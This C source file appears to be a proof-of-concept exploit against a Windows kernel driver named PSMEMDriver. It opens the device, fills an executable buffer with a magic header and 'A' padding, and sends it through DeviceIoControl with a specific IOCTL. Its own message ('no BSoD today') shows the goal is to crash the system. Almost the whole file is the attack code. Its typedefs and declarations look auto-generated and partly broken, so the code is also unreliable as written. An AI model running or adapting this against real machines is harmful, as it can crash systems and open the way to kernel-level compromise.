
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int lpInBuffer ;
typedef scalar_t__ ULONG64 ;
typedef int SIZE_T ;
typedef int * PVOID64 ;
typedef scalar_t__* PULONG64 ;
typedef int LPVOID ;
typedef scalar_t__ HANDLE ;


 int CloseHandle (scalar_t__) ;
 int DeviceIoControl (scalar_t__,int,int *,int *,int *,int *,scalar_t__*,int *) ;
 int FileName ;
 scalar_t__ GetDeviceHandle (int ) ;
 int GetLastError () ;
 scalar_t__ INVALID_HANDLE_VALUE ;
 int MEM_COMMIT ;
 int MEM_RELEASE ;
 int MEM_RESERVE ;
 int PAGE_EXECUTE_READWRITE ;
 int RtlFillMemory (int *,int,int) ;
 int * VirtualAlloc (int *,int,int,int ) ;
 int VirtualFree (int ,int,int ) ;
 int printf (char*,...) ;

int main()
{

 HANDLE hFile = ((void*)0);
 PVOID64 lpInBuffer = ((void*)0);
 ULONG64 lpBytesReturned;
 PVOID64 BuffAddress = ((void*)0);
 SIZE_T BufferSize = 0x800;

 printf("Trying the get the handle for the PSMEMDriver device.\r\n");

 hFile = GetDeviceHandle(FileName);

 if (hFile == INVALID_HANDLE_VALUE) {
  printf("Can't get the device handle, no BSoD today. 0x%X\r\n", GetLastError());
  return 1;
 }


 lpInBuffer = VirtualAlloc(((void*)0), BufferSize, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);


 if (lpInBuffer == ((void*)0)) {
  printf("VirtualAlloc() failed. \r\n");
  return 1;
 }


 BuffAddress = (PVOID64)(((ULONG64)lpInBuffer));
 *(PULONG64)BuffAddress = (ULONG64)0x542DF91B;
 BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x4));
 *(PULONG64)BuffAddress = (ULONG64)0x42424242;
 BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x8));

 RtlFillMemory(BuffAddress, BufferSize-0x8 , 0x41);



  DeviceIoControl(hFile,
   0xb3702c38,
   lpInBuffer,
   ((void*)0),
   ((void*)0),
   ((void*)0),
   &lpBytesReturned,
   ((void*)0));


 printf("Cleaning up.\r\n");
 VirtualFree((LPVOID)lpInBuffer, sizeof(lpInBuffer), MEM_RELEASE);
 CloseHandle(hFile);
 printf("Resources freed up.\r\n");
    return 0;
}
